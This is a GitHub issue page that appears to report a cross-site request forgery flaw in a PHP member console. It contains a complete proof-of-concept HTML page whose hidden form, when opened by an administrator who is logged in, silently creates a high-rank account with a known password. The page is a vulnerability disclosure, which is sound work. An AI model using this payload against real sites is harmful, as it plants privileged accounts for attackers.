Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
After the administrator logged in, open the following one page one.html add a High Rank account.
<!DOCTYPE html> <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://127.0.0.1/members/console.php?cID=5" method="POST"> <input type="hidden" name="newmember" value="test2" /> <input type="hidden" name="password" value="123456" /> <input type="hidden" name="password2" value="123456" /> <input type="hidden" name="set_rank" value="41" /> <input type="hidden" name="submit" value="Add New Member" /> <input type="hidden" name="checkCSRF" value="034afa58abf045d046ce7dba7b1b125e" /> <input type="submit" value="Submit request" /> </form> </body> </html>
The text was updated successfully, but these errors were encountered:
No branches or pull requests
After the administrator logged in, open the following one page
one.html add a High Rank account.
The text was updated successfully, but these errors were encountered: